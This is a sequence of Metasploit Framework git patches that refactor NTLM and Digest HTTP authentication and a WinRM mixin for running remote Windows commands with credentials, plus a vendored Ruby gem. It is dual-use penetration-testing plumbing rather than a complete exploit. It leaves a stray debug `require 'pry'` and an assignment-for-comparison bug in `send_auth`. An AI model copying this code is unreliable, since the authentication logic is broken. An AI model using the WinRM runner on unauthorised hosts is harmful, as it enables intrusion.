false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -156,7 +154,9 @@ module Exploit::Remote::HttpClient }, dossl, ssl_version, - proxies + proxies, + datastore['USERNAME'], + datastore['PASSWORD'] ) # Configure the HTTP client with the supplied parameter @@ -184,7 +184,15 @@ module Exploit::Remote::HttpClient 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'] + 'header_folding' => datastore['HTTP::header_folding'], + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], + 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], + 'send_lm' => datastore['NTLM::SendLM'], + 'send_ntlm' => datastore['NTLM::SendNTLM'], + 'SendSPN' => datastore['NTLM::SendSPN'], + 'UseLMKey' => datastore['NTLM::UseLMKey'], + 'domain' => datastore['DOMAIN'], + 'DigestAuthIIS' => datastore['DigestAuthIIS'] ) # If this connection is global, persist it @@ -251,6 +259,10 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -266,6 +278,10 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) + if opts['username'] and opts['username'] != '' + c.username = opts['username'].to_s + c.password = opts['password'].to_s + end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -277,241 +293,8 @@ module Exploit::Remote::HttpClient # Combine the user/pass into an auth string for the HTTP Client # def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - - # - # Connect to the server, and perform NTLM authentication for this session. - # Note the return value is [resp,c], so the caller can have access to both - # the last response, and the connection itself -- this is important since - # NTLM auth is bound to this particular TCP session. - # - # TODO: Fix up error messaging a lot more -- right now it's pretty hard - # to tell what all went wrong. - # - def send_http_auth_ntlm(opts={}, timeout = 20) - #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => ntlm_message_1 }})) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - if resp.code != 401 - return resp - end - return [nil,nil] unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). - resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end + return if not datastore['USERNAME'] + datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 46bfffcc86..ba46142a45 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,6 +8,8 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' +require 'pry' + module Rex module Proto module Http @@ -294,7 +296,7 @@ class Client # def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) - if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? + if res and res.code == 401 and res.headers['WWW-Authenticate'] res = send_auth(res, req.opts, t, persist) end res @@ -329,11 +331,6 @@ class Client conn.put(req.to_s) end - # Validates that the client has creds - def have_creds? - !(self.username.nil?) && self.username != '' - end - # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object @@ -343,8 +340,23 @@ class Client # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) - opts['username'] ||= self.username - opts['password'] ||= self.password + if opts['username'].nil? or opts['username'] == '' + if self.username and not (self.username == '') + opts['username'] = self.username + else + opts['username'] = nil + end + end + + if opts['password'].nil? or opts['password'] == '' + if self.password and not (self.password == '') + opts['password'] = self.password + else + opts['password'] = nil + end + end + + return res if opts['username'].nil? or opts['username'] = '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] From ac6fdf24a28184531ae5c90a09ce251258f30416 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 22:01:43 -0600 Subject: [PATCH 032/139] Fix winrm mixin from revert merge --- lib/msf/core/exploit/winrm.rb | 117 ++++++---------------------------- 1 file changed, 20 insertions(+), 97 deletions(-) diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb index 72b6a1f724..e61a29e5aa 100644 --- a/lib/msf/core/exploit/winrm.rb +++ b/lib/msf/core/exploit/winrm.rb @@ -42,7 +42,7 @@ module Exploit::Remote::WinRM c = connect(opts) to = opts[:timeout] || timeout ctype = "application/soap+xml;charset=UTF-8" - resp, c = send_request_cgi(opts.merge({ + resp = send_winrm_request(opts.merge({ 'uri' => opts['uri'], 'method' => 'POST', 'ctype' => ctype, @@ -61,7 +61,7 @@ module Exploit::Remote::WinRM end def winrm_run_cmd(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -76,17 +76,17 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) - resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) - resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id)) + resp = send_winrm_request(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_delete_shell_msg(shell_id)) return streams end def winrm_run_cmd_hanging(cmd, timeout=20) - resp,c = send_request_ntlm(winrm_open_shell_msg,timeout) + resp = send_winrm_request(winrm_open_shell_msg,timeout) if resp.nil? print_error "Recieved no reply from server" return nil @@ -101,9 +101,9 @@ module Exploit::Remote::WinRM return retval end shell_id = winrm_get_shell_id(resp) - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id),timeout) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id),timeout) streams = winrm_get_cmd_streams(resp) return streams end @@ -219,94 +219,6 @@ module Exploit::Remote::WinRM ::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16)) end - def send_request_ntlm(data, timeout = 20) - opts = { - 'uri' => datastore['URI'], - 'data' => data, - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - } - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - ctype = "application/soap+xml;charset=UTF-8" - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => ntlm_message_1}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def accepts_ntlm_auth parse_auth_methods(winrm_poke).include? "Negotiate" end @@ -329,6 +241,17 @@ module Exploit::Remote::WinRM return "/root/cimv2/" end + def send_winrm_request(data, timeout=20) + opts = { + 'uri' => datastore['URI'], + 'method' => 'POST', + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'ctype' => "application/soap+xml;charset=UTF-8" + } + send_request_cgi(opts,timeout) + end private From 6abbbeb3ca154776089b45c23624890b298e69b6 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 22:17:25 -0600 Subject: [PATCH 033/139] put gemcache for methodsource back --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 ++ .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 + .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 + .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 +++ .../gems/method_source-0.7.1/README.markdown | 91 ++++++++++ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ++++++++ .../method_source-0.7.1/lib/method_source.rb | 163 ++++++++++++++++++ .../lib/method_source/source_location.rb | 138 +++++++++++++++ .../lib/method_source/version.rb | 3 + .../method_source-0.7.1/method_source.gemspec | 33 ++++ .../gems/method_source-0.7.1/test/test.rb | 122 +++++++++++++ .../method_source-0.7.1/test/test_helper.rb | 50 ++++++ 13 files changed, 721 insertions(+) create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml new file mode 100644 index 0000000000..ba51bba6b2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml @@ -0,0 +1,17 @@ +rvm: + - 1.8.7 + - 1.9.2 + - 1.9.3 + - ree + - rbx-18mode + - rbx-19mode + - jruby + +notifications: + irc: "irc.freenode.org#pry" + recipients: + - jrmair@gmail.com + +branches: + only: + - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts new file mode 100644 index 0000000000..a4e7838016 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts @@ -0,0 +1 @@ +-m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile new file mode 100644 index 0000000000..e45e65f871 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile @@ -0,0 +1,2 @@ +source :rubygems +gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE new file mode 100644 index 0000000000..d1a50d62d0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE @@ -0,0 +1,25 @@ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown new file mode 100644 index 0000000000..d91b810a3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown @@ -0,0 +1,91 @@ +method_source +============= + +(C) John Mair (banisterfiend) 2011 + +_retrieve the sourcecode for a method_ + +*NOTE:* This simply utilizes `Method#source_location`; it + does not access the live AST. + +`method_source` is a utility to return a method's sourcecode as a +Ruby string. Also returns `Proc` and `Lambda` sourcecode. + +Method comments can also be extracted using the `comment` method. + +It is written in pure Ruby (no C). + +* Some Ruby 1.8 support now available. +* Support for MRI, RBX, JRuby, REE + +`method_source` provides the `source` and `comment` methods to the `Method` and +`UnboundMethod` and `Proc` classes. + +* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` +* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) +* See the [source code](http://github.com/banister/method_source) + +Example: display method source +------------------------------ + + Set.instance_method(:merge).source.display + # => + def merge(enum) + if enum.instance_of?(self.class) + @hash.update(enum.instance_variable_get(:@hash)) + else + do_with_enum(enum) { |o| add(o) } + end + + self + end + +Example: display method comments +-------------------------------- + + Set.instance_method(:merge).comment.display + # => + # Merges the elements of the given enumerable object to the set and + # returns self. + +Limitations: +------------ + +* Occasional strange behaviour in Ruby 1.8 +* Cannot return source for C methods. +* Cannot return source for dynamically defined methods. + +Special Thanks +-------------- + +[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. + +[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. + +[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. + +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile new file mode 100644 index 0000000000..92c0234f3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile @@ -0,0 +1,76 @@ +dlext = Config::CONFIG['DLEXT'] +direc = File.dirname(__FILE__) + +require 'rake/clean' +require 'rake/gempackagetask' +require "#{direc}/lib/method_source/version" + +CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") +CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", + "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", + "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") + +def apply_spec_defaults(s) + s.name = "method_source" + s.summary = "retrieve the sourcecode for a method" + s.version = MethodSource::VERSION + s.date = Time.now.strftime '%Y-%m-%d' + s.author = "John Mair (banisterfiend)" + s.email = 'jrmair@gmail.com' + s.description = s.summary + s.require_path = 'lib' + + s.add_development_dependency("bacon","~>1.1.0") + s.add_development_dependency("rake", "~>0.9") + s.homepage = "http://banisterfiend.wordpress.com" + s.has_rdoc = 'yard' + s.files = `git ls-files`.split("\n") + s.test_files = `git ls-files -- test/*`.split("\n") +end + +task :test do + sh "bacon -q #{direc}/test/test.rb" +end + +desc "reinstall gem" +task :reinstall => :gems do + sh "gem uninstall method_source" rescue nil + sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" +end + +desc "Set up and run tests" +task :default => [:test] + +namespace :ruby do + spec = Gem::Specification.new do |s| + apply_spec_defaults(s) + s.platform = Gem::Platform::RUBY + end + + Rake::GemPackageTask.new(spec) do |pkg| + pkg.need_zip = false + pkg.need_tar = false + end + + desc "Generate gemspec file" + task :gemspec do + File.open("#{spec.name}.gemspec", "w") do |f| + f << spec.to_ruby + end + end +end + +desc "build all platform gems at once" +task :gems => [:rmgems, "ruby:gem"] + +desc "remove all platform gems" +task :rmgems => ["ruby:clobber_package"] + +desc "build and push latest gems" +task :pushgems => :gems do + chdir("#{direc}/pkg") do + Dir["*.gem"].each do |gemfile| + sh "gem push #{gemfile}" + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb new file mode 100644 index 0000000000..9a3c325f75 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb @@ -0,0 +1,163 @@ +# (C) John Mair (banisterfiend) 2011 +# MIT License + +direc = File.dirname(__FILE__) + +require "#{direc}/method_source/version" +require "#{direc}/method_source/source_location" + +module MethodSource + # Determine if a string of code is a valid Ruby expression. + # @param [String] code The code to validate. + # @return [Boolean] Whether or not the code is a valid Ruby expression. + # @example + # valid_expression?("class Hello") #=> false + # valid_expression?("class Hello; end") #=> true + def self.valid_expression?(str) + if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ + Rubinius::Melbourne19.parse_string(str) + elsif defined?(Rubinius::Melbourne) + Rubinius::Melbourne.parse_string(str) + else + catch(:valid) { + eval("BEGIN{throw :valid}\n#{str}") + } + end + true + rescue SyntaxError + false + end + + # Helper method responsible for extracting method body. + # Defined here to avoid polluting `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [File] The opened source file + def self.source_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + (line - 1).times { file.readline } + + code = "" + loop do + val = file.readline + code << val + + return code if valid_expression?(code) + end + end + end + + # Helper method responsible for opening source file and buffering up + # the comments for a specified method. Defined here to avoid polluting + # `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [String] The comments up to the point of the method. + def self.comment_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + buffer = "" + (line - 1).times do + line = file.readline + # Add any line that is a valid ruby comment, + # but clear as soon as we hit a non comment line. + if (line =~ /^\s*#/) || (line =~ /^\s*$/) + buffer << line.lstrip + else + buffer.replace("") + end + end + + buffer + end + end + + # This module is to be included by `Method` and `UnboundMethod` and + # provides the `#source` functionality + module MethodExtensions + + # We use the included hook to patch Method#source on rubinius. + # We need to use the included hook as Rubinius defines a `source` + # on Method so including a module will have no effect (as it's + # higher up the MRO). + # @param [Class] klass The class that includes the module. + def self.included(klass) + if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && + RUBY_ENGINE =~ /rbx/ + + klass.class_eval do + orig_source = instance_method(:source) + + define_method(:source) do + begin + super + rescue + orig_source.bind(self).call + end + end + + end + end + end + + # Return the sourcecode for the method as a string + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method sourcecode as a string + # @example + # Set.instance_method(:clear).source.display + # => + # 